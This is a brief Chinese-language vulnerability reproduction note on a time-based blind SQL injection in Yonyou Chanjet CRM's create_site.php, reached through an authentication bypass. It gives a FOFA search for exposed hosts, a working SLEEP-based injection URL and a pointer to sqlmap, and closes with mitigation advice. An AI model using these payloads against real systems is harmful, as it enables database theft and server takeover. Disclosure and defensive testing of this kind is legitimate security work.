漏洞描述
用友畅捷CRM create_site.php处存在SQL时间盲注 ,未对后台功能做有效的身份认证与用户的输入进行安全过滤,导致在权限绕过可直接访问后台存在SQL注入漏洞的缺陷路径。
攻击者可以利用该漏洞获取网站后台数据库敏感信息,进一步利用可接管服务器权限。
漏洞复现
FOFA:app=“畅捷通-畅捷CRM”
payload:/WebSer~1/create_site.php?site_id=1
出现以上弹窗内容,证明漏洞存在
构造payload如下延时后弹窗
/WebSer~1/create_site.php?site_id=1+AND+%28SELECT+6663+FROM+%28SELECT%28SLEEP%285%29%29%29lbcfz%29
也可通过sqlmap测试
漏洞复现
畅捷通CRM版本官方已经不再维护,建议受影响的用户收敛系统仅内网访问或部署WAF